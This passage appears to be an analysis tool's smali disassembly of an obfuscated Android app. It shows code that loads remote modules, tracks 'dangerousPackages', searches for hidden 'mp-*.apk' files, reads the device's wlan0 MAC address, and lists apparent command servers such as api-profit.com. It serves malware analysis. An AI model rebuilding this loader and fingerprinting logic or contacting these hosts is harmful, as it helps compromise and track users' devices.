84if-ge v0, v3, :cond_7e
86iget-object v3, v2, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->jVOak:Ljava/util/List;
88invoke-virtual {v4, v0}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
89move-result-object v5
91invoke-interface {v3, v5}, Ljava/util/List;->add(Ljava/lang/Object;)Z
92add-int/lit8 v0, v0, 0x1
93goto/16 :goto_6c
94cond_7e:
95const-string v0, "dangerousPackages"
97invoke-virtual {p0, v0}, Lorg/json/JSONObject;->optJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
98move-result-object v3
99if-eqz v3, :cond_99
100move v0, v1
101goto_87:
102invoke-virtual {v3}, Lorg/json/JSONArray;->length()I
103move-result v4
104if-ge v0, v4, :cond_99
106iget-object v4, v2, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->CyGFDR:Ljava/util/ArrayList;
108invoke-virtual {v3, v0}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
109move-result-object v5
111invoke-virtual {v4, v5}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
112add-int/lit8 v0, v0, 0x1
113goto/16 :goto_87
114cond_99:
115const-string v0, "hic"
117invoke-virtual {p0, v0, v1}, Lorg/json/JSONObject;->optBoolean(Ljava/lang/String;Z)Z
118move-result v0
119iput-boolean v0, v2, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->DiXsQ:Z
120return-object v2
Cross References
APIs
  • org.json.JSONObject.getJSONObject
  • com.czybg.eqtbdmzpklrgyns.cXdqo.DiXsQ
  • org.json.JSONObject.getJSONObject
  • org.json.JSONObject.getString
  • org.json.JSONObject.getInt
  • org.json.JSONObject.getString
  • org.json.JSONObject.getBoolean
  • org.json.JSONObject.getLong
Strings
  • file
  • info
  • hash
  • type
  • pkg
  • scp
  • act
  • createdAt
  • startedAt
Position Instruction Meta Information
1const-string v0, "file"
3invoke-virtual {p1, v0}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
4move-result-object v0
6invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;->DiXsQ(Lorg/json/JSONObject;)Lcom/czybg/eqtbdmzpklrgyns/cXdqo;
7move-result-object v0
9const-string v1, "info"
11invoke-virtual {p1, v1}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
12move-result-object v1
13new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;
15invoke-direct {v2}, Lcom/czybg/eqtbdmzpklrgyns/qaNho;-><init>()V
17const-string v3, "hash"
19invoke-virtual {v1, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
20move-result-object v3
21iput-object v3, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->Odjrct:Ljava/lang/String;
23const-string v3, "type"
25invoke-virtual {v1, v3}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
26move-result v3
27iput v3, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
29const-string v3, "pkg"
31invoke-virtual {v1, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
32move-result-object v3
33iput-object v3, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->LmcGi:Ljava/lang/String;
35const-string v3, "scp"
37invoke-virtual {v1, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
38move-result-object v3
39iput-object v3, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->hZyMGHgz:Ljava/lang/String;
41const-string v3, "act"
43invoke-virtual {v1, v3}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
44move-result v3
45iput-boolean v3, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->xnLvoQ:Z
47const-string v3, "createdAt"
49invoke-virtual {v1, v3}, Lorg/json/JSONObject;->getLong(Ljava/lang/String;)J
50move-result-wide v3
51iput-wide v3, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->jVOak:J
53const-string v3, "startedAt"
55invoke-virtual {v1, v3}, Lorg/json/JSONObject;->getLong(Ljava/lang/String;)J
56move-result-wide v3
57iput-wide v3, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->CyGFDR:J
58new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/Module;
60invoke-direct {v1, p0, v0, v2}, Lcom/czybg/eqtbdmzpklrgyns/Module;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/cXdqo;Lcom/czybg/eqtbdmzpklrgyns/qaNho;)V
61return-object v1
Cross References
APIs
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.get
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.remove
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.get
  • java.lang.System.gc
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.remove
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • android.content.SharedPreferences.contains
  • android.content.SharedPreferences.edit
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • android.content.SharedPreferences$Editor.remove
  • android.content.SharedPreferences$Editor.apply
  • java.lang.Integer.valueOf
  • java.util.List.remove
  • java.lang.Exception.printStackTrace
Strings
  • rpwehwcnh4hbsd
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
3invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
4move-result-object v1
6invoke-virtual {v0, v1}, Ljava/util/concurrent/ConcurrentHashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
7move-result-object v0
8check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/Module;
9if-eqz v0, :cond_11
11invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/Module;->remove()V
12cond_11:
13iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
15invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
16move-result-object v1
18invoke-virtual {v0, v1}, Ljava/util/concurrent/ConcurrentHashMap;->remove(Ljava/lang/Object;)Ljava/lang/Object;
20iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DoHnmwOG:Ljava/util/concurrent/ConcurrentHashMap;
22invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
23move-result-object v1
25invoke-virtual {v0, v1}, Ljava/util/concurrent/ConcurrentHashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
26move-result-object v0
27check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;
28if-eqz v0, :cond_31
29try_start_28:
30invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->DiXsQ()V
31goto_2b: const/4 v1, 0x0
32iput-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->DiXsQ:Ljava/lang/Object;
34invoke-static {}, Ljava/lang/System;->gc()V
35cond_31:
36iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DoHnmwOG:Ljava/util/concurrent/ConcurrentHashMap;
38invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
39move-result-object v1
41invoke-virtual {v0, v1}, Ljava/util/concurrent/ConcurrentHashMap;->remove(Ljava/lang/Object;)Ljava/lang/Object;
43iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
45iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
46new-instance v2, Ljava/lang/StringBuilder;
48const-string v3, "rpwehwcnh4hbsd"
50invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
52invoke-virtual {v2, p1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
53move-result-object v2
55invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
56move-result-object v2
58invoke-interface {v1, v2}, Landroid/content/SharedPreferences;->contains(Ljava/lang/String;)Z
59move-result v1
60if-eqz v1, :cond_7d
62iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
64invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
65move-result-object v1
66new-instance v2, Ljava/lang/StringBuilder;
68const-string v3, "rpwehwcnh4hbsd"
70invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
72invoke-virtual {v2, p1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
73move-result-object v2
75invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
76move-result-object v2
78invoke-interface {v1, v2}, Landroid/content/SharedPreferences$Editor;->remove(Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
79move-result-object v1
81invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->apply()V
83invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->LmcGi()Ljava/util/List;
84move-result-object v1
86invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
87move-result-object v2
89invoke-interface {v1, v2}, Ljava/util/List;->remove(Ljava/lang/Object;)Z
91invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ(Ljava/util/List;)V
92cond_7d: return-void
93catch_7e: move-exception v1
95invoke-virtual {v1}, Ljava/lang/Exception;->printStackTrace()V
96goto/16 :goto_2b
Cross References
APIs
  • java.io.File.<init>
  • java.io.File.listFiles
  • java.io.File.isFile
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.util.regex.Pattern.compile
  • java.io.File.getName
  • java.lang.String.toLowerCase
  • java.util.regex.Pattern.matcher
  • java.util.regex.Matcher.matches
  • java.util.regex.Matcher.groupCount
  • java.util.regex.Matcher.group
  • java.io.File.isDirectory
  • java.io.File.getAbsolutePath
  • java.lang.String.startsWith
Strings
  • .*\\.
  • mp-(.*?)\\.apk
  • /sys/
  • /proc/
Position Instruction Meta Information
0new-instance v0, Ljava/io/File;
2invoke-direct {v0, p1}, Ljava/io/File;-><init>(Ljava/lang/String;)V
4invoke-virtual {v0}, Ljava/io/File;->listFiles()[Ljava/io/File;
5move-result-object v2
6if-eqz v2, :cond_75
7array-length v3, v2
8const/4 v0, 0x0
9move v1, v0
10goto_e: if-ge v1, v3, :cond_75
11aget-object v0, v2, v1
13invoke-virtual {v0}, Ljava/io/File;->isFile()Z
14move-result v4
15if-eqz v4, :cond_51
16new-instance v4, Ljava/lang/StringBuilder;
18const-string v5, ".*\\."
20invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
22iget-object v5, p0, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->hZyMGHgz:Ljava/lang/String;
24invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
25move-result-object v4
27const-string v5, "mp-(.*?)\\.apk"
29invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
30move-result-object v4
32invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
33move-result-object v4
35invoke-static {v4}, Ljava/util/regex/Pattern;->compile(Ljava/lang/String;)Ljava/util/regex/Pattern;
36move-result-object v4
38invoke-virtual {v0}, Ljava/io/File;->getName()Ljava/lang/String;
39move-result-object v0
41invoke-virtual {v0}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
42move-result-object v0
44invoke-virtual {v4, v0}, Ljava/util/regex/Pattern;->matcher(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;
45move-result-object v0
47invoke-virtual {v0}, Ljava/util/regex/Matcher;->matches()Z
48move-result v4
49if-eqz v4, :cond_71
51invoke-virtual {v0}, Ljava/util/regex/Matcher;->groupCount()I
52move-result v4
53if-lez v4, :cond_71
54const/4 v1, 0x1
56invoke-virtual {v0, v1}, Ljava/util/regex/Matcher;->group(I)Ljava/lang/String;
57move-result-object v0
58cond_50: return-object v0
59cond_51:
60invoke-virtual {v0}, Ljava/io/File;->isDirectory()Z
61move-result v4
62if-eqz v4, :cond_71
64invoke-virtual {v0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
65move-result-object v0
67const-string v4, "/sys/"
69invoke-virtual {v0, v4}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
70move-result v4
71if-nez v4, :cond_71
73const-string v4, "/proc/"
75invoke-virtual {v0, v4}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
76move-result v4
77if-nez v4, :cond_71
79invoke-direct {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->LmcGi(Ljava/lang/String;)Ljava/lang/String;
80move-result-object v0
81if-nez v0, :cond_50
82cond_71: add-int/lit8 v0, v1, 0x1
83move v1, v0
84goto/16 :goto_e
85cond_75: const/4 v0, 0x0
86goto/16 :goto_50
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • android.content.Context.getAssets
  • android.content.res.AssetManager.open
  • java.io.InputStreamReader.<init>
  • java.io.BufferedReader.<init>
  • java.io.BufferedReader.readLine
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.lang.StringBuilder.append
  • java.io.InputStreamReader.close
  • java.io.InputStream.close
  • java.io.BufferedReader.close
  • java.lang.StringBuilder.toString
  • java.lang.StringBuilder.length
  • java.lang.StringBuilder.delete
  • java.io.InputStreamReader.close
  • java.io.InputStream.close
  • java.io.BufferedReader.close
  • java.io.InputStreamReader.close
  • java.io.InputStream.close
  • java.io.BufferedReader.close
Position Instruction Meta Information
0const/4 v1, 0x0
1new-instance v4, Ljava/lang/StringBuilder;
3invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
4try_start_6:
5invoke-virtual {p0}, Landroid/content/Context;->getAssets()Landroid/content/res/AssetManager;
6move-result-object v0
8invoke-virtual {v0, p1}, Landroid/content/res/AssetManager;->open(Ljava/lang/String;)Ljava/io/InputStream;
9try_end_d: move-result-object v3
10try_start_e: new-instance v2, Ljava/io/InputStreamReader;
12invoke-direct {v2, v3}, Ljava/io/InputStreamReader;-><init>(Ljava/io/InputStream;)V
13try_end_13: new-instance v0, Ljava/io/BufferedReader;
15invoke-direct {v0, v2}, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
16try_end_18:
17invoke-virtual {v0}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
18move-result-object v1
19if-eqz v1, :cond_4c
20new-instance v5, Ljava/lang/StringBuilder;
22invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
24invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
25move-result-object v1
26const/16 v5, 0xa
28invoke-virtual {v1, v5}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
29move-result-object v1
31invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
32move-result-object v1
34invoke-virtual {v4, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
35try_end_34: goto/16 :goto_18
36catch_35: move-exception v1
37move-object v1, v2
38move-object v2, v3
39goto_38: if-eqz v1, :cond_3d
40try_start_3a:
41invoke-virtual {v1}, Ljava/io/InputStreamReader;->close()V
42cond_3d: if-eqz v2, :cond_42
44invoke-virtual {v2}, Ljava/io/InputStream;->close()V
45cond_42: if-eqz v0, :cond_47
47invoke-virtual {v0}, Ljava/io/BufferedReader;->close()V
48goto_47:
49invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
50move-result-object v0
51return-object v0
52try_start_4c:
53invoke-virtual {v4}, Ljava/lang/StringBuilder;->length()I
54move-result v1
55add-int/lit8 v1, v1, -0x1
57invoke-virtual {v4}, Ljava/lang/StringBuilder;->length()I
58move-result v5
60invoke-virtual {v4, v1, v5}, Ljava/lang/StringBuilder;->delete(II)Ljava/lang/StringBuilder;
61try_end_59:
62invoke-virtual {v2}, Ljava/io/InputStreamReader;->close()V
63if-eqz v3, :cond_61
65invoke-virtual {v3}, Ljava/io/InputStream;->close()V
66cond_61:
67invoke-virtual {v0}, Ljava/io/BufferedReader;->close()V
68try_end_64: goto/16 :goto_47
69catch_65: move-exception v0
70goto/16 :goto_47
71catchall_67: move-exception v0
72move-object v2, v1
73move-object v3, v1
74goto_6a: if-eqz v2, :cond_6f
75try_start_6c:
76invoke-virtual {v2}, Ljava/io/InputStreamReader;->close()V
77cond_6f: if-eqz v3, :cond_74
79invoke-virtual {v3}, Ljava/io/InputStream;->close()V
80cond_74: if-eqz v1, :cond_79
82invoke-virtual {v1}, Ljava/io/BufferedReader;->close()V
83try_end_79: throw v0
84catch_7a: move-exception v1
85goto/16 :goto_79
86catchall_7c: move-exception v0
87move-object v2, v1
88goto/16 :goto_6a
89catchall_7f: move-exception v0
90goto/16 :goto_6a
91catchall_81: move-exception v1
92move-object v6, v1
93move-object v1, v0
94move-object v0, v6
95goto/16 :goto_6a
96catch_86: move-exception v0
97goto/16 :goto_47
98catch_88: move-exception v0
99move-object v0, v1
100move-object v2, v1
101goto/16 :goto_38
102catch_8c: move-exception v0
103move-object v0, v1
104move-object v2, v3
105goto/16 :goto_38
106catch_90: move-exception v0
107move-object v0, v1
108move-object v1, v2
109move-object v2, v3
110goto/16 :goto_38
Cross References
APIs
  • java.net.NetworkInterface.getNetworkInterfaces
  • java.util.Collections.list
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.net.NetworkInterface.getName
  • java.lang.String.equalsIgnoreCase
  • java.net.NetworkInterface.getHardwareAddress
  • java.lang.StringBuilder.<init>
  • java.lang.Byte.valueOf
  • java.lang.String.format
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.length
  • java.lang.StringBuilder.deleteCharAt
  • java.lang.StringBuilder.toString
  • java.lang.Exception.printStackTrace
Strings
  • wlan0
  • %02X:
Position Instruction Meta Information
0const/4 v1, 0x0
1try_start_1:
2const-string v2, "wlan0"
4invoke-static {}, Ljava/net/NetworkInterface;->getNetworkInterfaces()Ljava/util/Enumeration;
5move-result-object v0
7invoke-static {v0}, Ljava/util/Collections;->list(Ljava/util/Enumeration;)Ljava/util/ArrayList;
8move-result-object v0
10invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
11move-result-object v3
12cond_f:
13invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
14move-result v0
15if-eqz v0, :cond_67
17invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
18move-result-object v0
19check-cast v0, Ljava/net/NetworkInterface;
21invoke-virtual {v0}, Ljava/net/NetworkInterface;->getName()Ljava/lang/String;
22move-result-object v4
24invoke-virtual {v4, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
25move-result v4
26if-eqz v4, :cond_f
28invoke-virtual {v0}, Ljava/net/NetworkInterface;->getHardwareAddress()[B
29move-result-object v2
30if-nez v2, :cond_2e
32const-string v0, ""
33goto_2d: return-object v0
34cond_2e: new-instance v3, Ljava/lang/StringBuilder;
36invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
37array-length v4, v2
38move v0, v1
39goto_35: if-ge v0, v4, :cond_4f
40aget-byte v1, v2, v0
42const-string v5, "%02X:"
43const/4 v6, 0x1
44new-array v6, v6, [Ljava/lang/Object;
45const/4 v7, 0x0
47invoke-static {v1}, Ljava/lang/Byte;->valueOf(B)Ljava/lang/Byte;
48move-result-object v1
49aput-object v1, v6, v7
51invoke-static {v5, v6}, Ljava/lang/String;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;
52move-result-object v1
54invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
55add-int/lit8 v0, v0, 0x1
56goto/16 :goto_35
57cond_4f:
58invoke-virtual {v3}, Ljava/lang/StringBuilder;->length()I
59move-result v0
60if-lez v0, :cond_5e
62invoke-virtual {v3}, Ljava/lang/StringBuilder;->length()I
63move-result v0
64add-int/lit8 v0, v0, -0x1
66invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->deleteCharAt(I)Ljava/lang/StringBuilder;
67cond_5e:
68invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
69try_end_61: move-result-object v0
70goto/16 :goto_2d
71catch_63: move-exception v0
73invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
74cond_67:
75const-string v0, ""
76goto/16 :goto_2d
Cross References
APIs
  • java.lang.String.split
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.lang.String.startsWith
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.lang.String.split
  • java.lang.String.trim
  • java.lang.String.split
  • java.lang.Integer.parseInt
Strings
  • Uid
  • \n
  • :
  • \\s+
Position Instruction Meta Information
0const/4 v0, 0x0
1try_start_1:
2const-string v1, "Uid"
4iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;->Odjrct:Ljava/lang/String;
6const-string v3, "\n"
8invoke-virtual {v2, v3}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
9move-result-object v2
10array-length v3, v2
11goto_c: if-ge v0, v3, :cond_58
12aget-object v4, v2, v0
13new-instance v5, Ljava/lang/StringBuilder;
15invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
17invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
18move-result-object v5
20const-string v6, ":"
22invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
23move-result-object v5
25invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
26move-result-object v5
28invoke-virtual {v4, v5}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
29move-result v5
30if-eqz v5, :cond_55
31new-instance v0, Ljava/lang/StringBuilder;
33invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
35invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
36move-result-object v0
38const-string v1, ":"
40invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
41move-result-object v0
43invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
44move-result-object v0
46invoke-virtual {v4, v0}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
47move-result-object v0
48const/4 v1, 0x1
49aget-object v0, v0, v1
51invoke-virtual {v0}, Ljava/lang/String;->trim()Ljava/lang/String;
52move-result-object v0
53goto_47:
54const-string v1, "\\s+"
56invoke-virtual {v0, v1}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
57move-result-object v0
58const/4 v1, 0x0
59aget-object v0, v0, v1
61invoke-static {v0}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
62try_end_53: move-result v0
63goto_54: return v0
64cond_55: add-int/lit8 v0, v0, 0x1
65goto/16 :goto_c
66cond_58: const/4 v0, 0x0
67goto/16 :goto_47
68catch_5a: move-exception v0
69const/4 v0, -0x1
70goto/16 :goto_54
Cross References
APIs
  • org.json.JSONArray.<init>
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
Strings
  • type
  • hash
  • createdAt
  • startedAt
Position Instruction Meta Information
0new-instance v1, Lorg/json/JSONArray;
2invoke-direct {v1}, Lorg/json/JSONArray;-><init>()V
4invoke-interface {p0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
5move-result-object v2
6goto_9:
7invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
8move-result v0
9if-eqz v0, :cond_3f
11invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
12move-result-object v0
13check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/Module;
14new-instance v3, Lorg/json/JSONObject;
16invoke-direct {v3}, Lorg/json/JSONObject;-><init>()V
18const-string v4, "type"
20iget-object v5, v0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
21iget v5, v5, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
23invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
25const-string v4, "hash"
27iget-object v5, v0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
29iget-object v5, v5, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->Odjrct:Ljava/lang/String;
31invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
33const-string v4, "createdAt"
35iget-object v5, v0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
36iget-wide v5, v5, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->jVOak:J
38invoke-virtual {v3, v4, v5, v6}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
40const-string v4, "startedAt"
42iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
43iget-wide v5, v0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->CyGFDR:J
45invoke-virtual {v3, v4, v5, v6}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
46goto/16 :goto_9
47cond_3f: return-object v1
Cross References
APIs
  • java.lang.Object.<init>
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • java.util.List.isEmpty
  • java.util.List.add
  • java.util.List.get
  • java.lang.System.currentTimeMillis
  • java.util.List.isEmpty
  • java.lang.System.currentTimeMillis
  • java.util.List.add
Strings
  • https://api-profit.com
  • https://alluorine.info
  • https://mancortz.info
Position Instruction Meta Information
0const-wide/16 v2, 0x0
1const/4 v4, 0x0
2const/4 v5, 0x1
4invoke-direct {p0}, Ljava/lang/Object;-><init>()V
5new-instance v0, Landroid/os/Handler;
7invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
8move-result-object v1
10invoke-direct {v0, v1}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
11iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->jVOak:Landroid/os/Handler;
12iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->xnLvoQ:Landroid/content/Context;
13new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
15invoke-direct {v0, p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;-><init>(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;Landroid/content/Context;)V
16iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
18iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
20invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ()Ljava/util/List;
21move-result-object v0
22sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
24iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
26invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->Odjrct()Ljava/util/List;
27move-result-object v0
28sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
30sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
32invoke-interface {v0}, Ljava/util/List;->isEmpty()Z
33move-result v0
34if-eqz v0, :cond_6a
36sget-object v6, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
37new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
39const-string v1, "https://api-profit.com"
41invoke-direct/range {v0 .. v5}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;-><init>(Ljava/lang/String;JZZ)V
43invoke-interface {v6, v0}, Ljava/util/List;->add(Ljava/lang/Object;)Z
45sget-object v6, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
